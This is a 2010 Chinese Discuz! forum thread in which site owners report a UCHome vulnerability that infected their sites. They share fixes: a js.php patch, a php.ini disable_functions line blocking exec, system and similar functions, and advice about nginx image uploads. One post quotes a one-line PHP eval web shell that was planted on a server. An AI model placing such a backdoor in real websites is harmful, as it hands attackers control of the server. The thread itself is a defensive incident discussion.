Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索

[分享] UChome出漏洞,来提醒一下各位,好自为之。

[复制链接]
 楼主| wuxiansj 发表于 2010-6-4 15:02:19 | 显示全部楼层
回复 9# bugx 的帖子


    你把uchome删掉要是还能进来,就证明有后门~呃~
回复

使用道具 举报

hjb510 发表于 2010-6-4 15:31:23 | 显示全部楼层
哇噻,证明解决啊,新装上,正想举行活动以送Q钻来拉人气的,没想到在这里看到漏洞,怕怕啊,不知道在linux里面会不会有危险啊,知道的给我发个短消息。
回复

使用道具 举报

bugx 发表于 2010-6-4 17:20:47 | 显示全部楼层
回复 12# hjb510 的帖子


    我的就是LINUX的,一样被挂啊。

刚才又被写入了一句木马

<?php @eval($_POST['c']);?>
回复

使用道具 举报

bfwd 发表于 2010-6-4 17:28:19 | 显示全部楼层
确实有这个问题,跟操作系统没关系

我昨天又被传了个这样的文件上来

不过上次之后,修改了php.ini

disable_functions =passthru,exec,shell_exec,system

这次传上文件来,没权限执行了挂马操作了
回复

使用道具 举报

赤色彗星 发表于 2010-6-4 17:28:53 | 显示全部楼层
DZ论坛也有漏洞
回复

使用道具 举报

ant_Z 发表于 2010-6-4 17:28:59 | 显示全部楼层
上传图片木马这个漏洞是ngnix里的漏洞,是解析问题,uch上传图片是经过过滤的,对于ngnix,要么升级,要么暂停图片上传。
回复

使用道具 举报

赤色彗星 发表于 2010-6-4 17:44:37 | 显示全部楼层
这个漏洞是4月15日发现的,你只要打了4.16的补丁就没事了

手动修复i的方法打开js.php

找到

$r = array("\n", '', 'js_mkurl("\\1", "\\2")');
替换为
$r = array("\n", '', "js_mkurl('\\1', '\\2')");


你要是打了4.16的补丁就发现已经是那句代码 $r = array("\n", '', "js_mkurl('\\1', '\\2')");  
回复

使用道具 举报

houge2006 发表于 2010-6-4 17:47:32 | 显示全部楼层
我 windows 虚拟主机 设置不了权限怎么办?
回复

使用道具 举报

iStory 发表于 2010-6-5 17:27:11 | 显示全部楼层
我早已经中毒~
images的目录下都有一个gifimg.php文件,并且加密过。
有些PHP和html文件被感染。
回复

使用道具 举报

 楼主| wuxiansj 发表于 2010-6-7 09:39:44 | 显示全部楼层
回复 17# 赤色彗星 的帖子


    我们在5月末下载的版本,安装的uchome,一样中招。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2024-11-25 11:24 , Processed in 0.026376 second(s), 3 queries , Gzip On, Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表